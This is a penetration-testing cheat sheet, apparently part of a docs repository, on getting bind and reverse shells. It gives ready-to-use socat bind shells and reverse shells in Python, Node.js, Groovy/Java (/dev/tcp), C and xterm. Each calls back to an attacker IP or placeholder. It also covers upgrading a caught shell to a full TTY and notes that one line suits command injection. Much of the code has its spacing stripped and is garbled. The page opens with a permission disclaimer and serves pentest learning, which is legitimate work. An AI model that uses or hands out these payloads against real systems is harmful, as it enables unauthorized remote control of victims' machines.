Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
TODO: description, methodology, and script prep for each section (issue #15)
Add description and methodology as needed for each section
Prep all code examples for scripting (replace IPs and ports with variables, etc.)
Ensure code examples' variables are appropriate for their respective programming language
Bind shells
Bind shells are used when the attacker connects directly to the victim.
socat
socat-TCP4:$victim_ip:$port
The dash - is required to transfer keyboard data back and forth between the machines.
Encrypted bind shell
To create an encrypted bind shell, first a self-signed certificate must be created. It must either be created on the victim machine, or transferred prior to using the bind shell.
This command will create a new 2048-bit encryption key and certificate using the RSA algorithm. The certificate will be valid for 365 days. The key and certifcate information must be combined into one .pem file using cat.
Next, use socat to create the bind shell using this .pem certificate. verify=0 will be used to disable SSL verification. Since you are using SSL on port 443 you need to run the listener with sudo if the victim machine is running Linux.
#listener on victimsocat.exeOPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,forkEXEC:"C:\Windows\System32\cmd.exe"#attacker clientsocat-OPENSSL:$IP:443,verify=0
Reverse Shells
Reverse shells are used when the attacker gets the victim machine to connect back to their machine. Useful when firewalls or other security devices prevent bind shells.
export RHOST="192.168.1.2";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
(function(){ var net =require("net"), cp =require("child_process"), sh =cp.spawn("/bin/sh", []); var client =newnet.Socket(); client.connect(LPORT,"LHOST",function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();
Java Reverse Shell
r =Runtime.getRuntime()p =r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()
C Reverse Shell
#include<stdio.h>#include<sys/socket.h>#include<netinet/ip.h>#include<arpa/inet.h>#include<unistd.h>intmain (){constchar* ip ="192.168.1.2";struct sockaddr_in addr;addr.sin_family = AF_INET;addr.sin_port =htons(4444);inet_aton(ip,&addr.sin_addr);int sockfd =socket(AF_INET, SOCK_STREAM,0);connect(sockfd, (struct sockaddr *)&addr,sizeof(addr));for (int i =0; i <3; i++){dup2(sockfd, i);}execve("/bin/sh",NULL,NULL);return0;}
XTERM Reverse Shell
# Start an open X Server on your system (:1 – which listens on TCP port 6001)apt-getinstallxnestXnest:1# Then remember to authorise on your system the target IP to connect to youxterm-display127.0.0.1:1# Run this INSIDE the spawned xterm on the open X Serverxhost+targetip# Then on the target connect back to the your X Serverxterm-displayattackerip:1/usr/openwin/bin/xterm-displayattackerip:1or$DISPLAY=attackerip:0xterm
After catching a shell through netcat, you are placed in a shell that has very limited functionality. If the remote machine has python or python3 installed you can easily upgrade to a fully functional TTY shell.
Note: To check if the shell is a TTY shell use the tty command.
Upgrade to fully interactive shell (python example):
#On victim machinepython-c'import pty;pty.spawn("/bin/bash")'; #spawn python psuedo-shellctrl-z#send to background#On attacker's machinesttyraw-echo#https://stackoverflow.com/questions/22832933/what-does-stty-raw-echo-do-on-os-xsttysize#get local number of rows & columnsfg#to return shell to foreground#On victim machineexport SHELL=bashsttyrows $x columns $y #Set remote shell to x number of rows & y columnsexport TERM=xterm-256color #allows you to clear console, and have color output
When using some shells such as zsh or fish on the attacking machine your shell will break after you try to upgrade it using this method. Some of the things I have found that help mitigate this are:
Use rlwrap nc -lvnp when setting up your listener,
make sure not to put a space in your python pty command after the import,
type stty size;stty raw -echo;fg all on one line.
Finally, as a last resort, you could just switch to bash instead when setting up your nc listener.
Upgrade from a basic shell to a bash TTY using script.
SHELL=/bin/bashscript-q/dev/null
Using “Expect” To Get A TTY
If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.
#Create a script called `sh.exp`#!/usr/bin/expect# Spawn a shell, then allow the user to interact with it.# The new shell will have a good enough TTY to run tools like ssh, su and loginspawnshinteract
Using socat
Another option is to upload the binary for socat to the victim machine and magically get a fully interactive shell. Download the appropriate binaries from https://github.com/andrew-d/static-binaries. Socat needs to be on both machines for this to work.
This one-liner can be injected wherever you can get command injection for an instant reverse shell. Point the path to the binary to your local http server if internet access is limited on the victim.
r =Runtime.getRuntime()p =r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()
xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorize the target to connect to you (command also run on your host):